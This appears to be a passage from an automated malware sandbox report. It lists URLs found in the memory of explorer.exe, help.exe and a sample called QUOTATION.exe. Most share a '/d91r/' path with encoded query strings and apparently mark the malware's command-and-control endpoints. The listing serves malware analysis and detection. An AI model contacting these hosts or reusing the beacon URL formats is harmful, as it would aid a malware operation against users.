          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.comwww.
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.comwww.texasgent.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.media
          Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.media/d91r/
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.media/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.mediawww.dexmart.xyz
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000002.8041134967.0000000015AE0000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000055A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/?8H7gL=Bxcfm_qbbEGm&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhd
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.comwww.eta-trader.net
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com
          Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/d91r/
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.comwww.184411.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.com/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.comwww.flaviosilva.online
          Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz/d91r/
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyzwww.finelinetackdirect.com
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dhiyasecurities.com
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dhiyasecurities.com/d91r/
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dhiyasecurities.com/d91r/ldE8Xu=oYWDxG4UFF1
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dhiyasecurities.comwww.popularartprints.org
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.netwww.funvacayflorida.com
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantasticserver.yachts
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantasticserver.yachts/d91r/
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantasticserver.yachts/d91r/ldE8Xu=oYWDxG4UFF1
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantasticserver.yachtswww.dhiyasecurities.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.comwww.maxhaidt.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.online
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.online/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.onlinewww.solya-shop.com
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com
          Source: help.exe, 0000000A.00000002.8005674246.00000000058C4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPtQiCFpqnDhHGDoC
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.comT
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net
          Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net/d91r/
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.netd&www.aznqmd.com
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.netwww.aznqmd.com
          Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ru
          Source: explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ru/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ruwww.cardinialethanol.com
